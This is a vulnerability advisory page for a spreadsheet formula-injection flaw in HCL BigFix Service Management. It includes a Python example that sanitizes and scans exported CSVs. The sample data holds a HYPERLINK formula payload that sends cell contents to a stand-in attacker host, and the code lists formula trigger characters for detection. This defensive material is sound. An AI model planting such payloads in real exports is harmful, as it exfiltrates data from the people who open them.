CVE-2025-31978
HCL BigFix Service Management Spreadsheet File Processing Flaw
Publication date: 2026-05-06
Last updated on: 2026-05-06
Assigner: HCL Software
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| hcl | bigfix_service_management | * |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-201 | The code transmits data to another actor, but a portion of the data includes sensitive information that should not be accessible to that actor. |
AI Powered Q&A
Can you explain this vulnerability to me?
HCL BigFix Service Management (SM) does not sanitize cell contents before it processes or distributes spreadsheet files such as CSV, XLS and XLSX, and does not render them safely.
This is the formula-injection (CSV-injection) pattern: a low-privileged user enters text that begins with a formula trigger into a field that later lands in an exported spreadsheet. When another user opens that file in a spreadsheet application, the application evaluates the cell as a formula instead of displaying it as text, which can exfiltrate data from the sheet or trigger other harmful actions.
Current versions of Excel warn before running untrusted content, but the flaw is BigFix SM's unsafe handling of the files, not the spreadsheet application's behaviour, so that warning should not be relied on as the mitigation.
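The following is an added example, not HCL's code or anything from the advisory. It reproduces the pattern described above with constructed ticket data (the host name attacker.example, the column layout and the ticket values are assumptions): an unsanitized export carries an attacker-supplied formula through to the CSV, a sanitized export neutralizes it with the widely used leading-apostrophe mitigation, and a scanner flags any cell in an existing export that a spreadsheet would evaluate.

```python
"""Added example (not HCL's code): CSV/formula-injection demo and mitigation."""
import csv
import io

# First characters that Excel / LibreOffice Calc / Google Sheets treat as the
# start of a formula, or as a break that can smuggle one into the next cell.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: str) -> bool:
    """True if a spreadsheet would try to evaluate this cell as a formula."""
    return value.startswith(FORMULA_TRIGGERS)


def sanitize_cell(value) -> str:
    """Force a cell to be interpreted as literal text.

    Prefixing a formula-like value with a single quote makes spreadsheet
    applications show it as text. Legitimate values such as "-5" or "+1" are
    prefixed too; emit real numbers as numeric types upstream if that matters.
    """
    text = "" if value is None else str(value)
    if is_formula_like(text):
        text = "'" + text
    return text


def export_csv(rows, header, sanitize=True) -> str:
    """Serialize rows to CSV. sanitize=False reproduces the vulnerable behaviour:
    quoting alone does not stop a spreadsheet from evaluating a leading '='."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        if sanitize:
            writer.writerow([sanitize_cell(c) for c in row])
        else:
            writer.writerow(["" if c is None else str(c) for c in row])
    return buf.getvalue()


def scan_csv_for_formulas(text: str):
    """Audit an existing export: return (row, column, value) for every cell a
    spreadsheet would evaluate. Usable as a pre-delivery check on any CSV."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                findings.append((r, c, cell))
    return findings


# Constructed sample data (assumption): a ticket whose summary field was filled
# in by an attacker. The HYPERLINK formula sends the contents of cell A2 to an
# attacker-controlled host when the victim clicks the rendered link.
HEADER = ["id", "requester", "summary"]
ROWS = [
    [1, "alice", "Printer on floor 3 is jammed"],
    [2, "mallory", '=HYPERLINK("https://attacker.example/?t="&A2,"Open ticket")'],
    [3, "bob", "-3 degrees in server room"],
]


def demo():
    """Export the sample rows both ways and scan each result."""
    unsafe = export_csv(ROWS, HEADER, sanitize=False)
    safe = export_csv(ROWS, HEADER, sanitize=True)
    return {
        "unsafe_findings": scan_csv_for_formulas(unsafe),
        "safe_findings": scan_csv_for_formulas(safe),
        "safe_csv": safe,
    }


if __name__ == "__main__":
    result = demo()
    print("cells a spreadsheet would evaluate in the unsafe export:")
    for r, c, v in result["unsafe_findings"]:
        print(f"  row {r} col {c}: {v!r}")
    print("findings after sanitizing:", result["safe_findings"])
    print(result["safe_csv"])
```

The scanner also flags the harmless "-3 degrees" cell, which is the expected trade-off of the apostrophe approach: it errs toward text for anything a spreadsheet might parse as a formula, so the export stays safe even when the input vocabulary is unknown.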
How can this vulnerability impact me?
This vulnerability can lead to partial compromise of the confidentiality and integrity of data.
- An attacker could exfiltrate sensitive information through malicious spreadsheet content.
- Malicious actions could run automatically when the spreadsheet is opened, potentially leading to further exploitation.
The CVSS score of 4.6 (medium severity) reflects a network attack vector, low privileges required, and required user interaction (the victim must open the exported file).
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The vulnerability in HCL BigFix Service Management involves inadequate sanitization and unsafe rendering of spreadsheet files, which could lead to information exfiltration or other malicious activity. Such risks may affect compliance with data protection standards and regulations like GDPR and HIPAA, which require safeguarding sensitive information against unauthorized access or leakage.
However, the available information does not explicitly describe the direct effects of this vulnerability on compliance with these standards or regulations.